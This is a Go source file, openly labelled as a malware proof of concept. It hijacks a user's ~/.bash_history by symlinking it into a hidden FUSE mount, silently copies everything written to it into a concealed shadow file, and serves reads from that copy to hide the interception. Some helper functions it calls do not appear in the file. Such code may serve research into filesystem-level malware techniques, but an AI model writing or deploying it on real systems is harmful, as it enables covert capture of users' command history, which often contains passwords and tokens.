package main

import (
        "os"
        "os/signal"
        "os/user"
        "path/filepath"
        "syscall"
)

var (
        mountPath    string
        originalFile string
        shadowFile   string
        homeDir      string
)

/*
Malware in the filesystem.

This PoC does the following:
- Creates a copy of .bash_history file (shadow file)
- Creates a FUSE mount point.
- Creates a symlink from .bash_history to a file inside the FUSE mount point
- Captures the history data when written to .bash_history
- Writes a copy of the data to the shadow file
- When .bash_history is read, serve the data from the shadow file
*/
func main() {
        usr, err := user.Current()
        handleError(err)

        homeDir = usr.HomeDir

        historyName := ".bash_history"
        if len(os.Args) > 1 {
                historyName = os.Args[1]
        }

        originalFile = filepath.Join(homeDir, historyName)
        shadowFile = filepath.Join(homeDir, ".bh_copy")
        createCopy()

        mountPath = filepath.Join(homeDir, ".mount")
        err = os.MkdirAll(mountPath, 0755)
        handleError(err)

        createLink()
        go installFuse()
        handleSignals()
}

func handleSignals() {
        sigs := make(chan os.Signal, 1)
        done := make(chan bool, 1)

        signal.Notify(sigs, syscall.SIGINT, syscall.SIGTERM)

        go func() {
                <-sigs
                clean()
                done <- true
        }()

        <-done
}

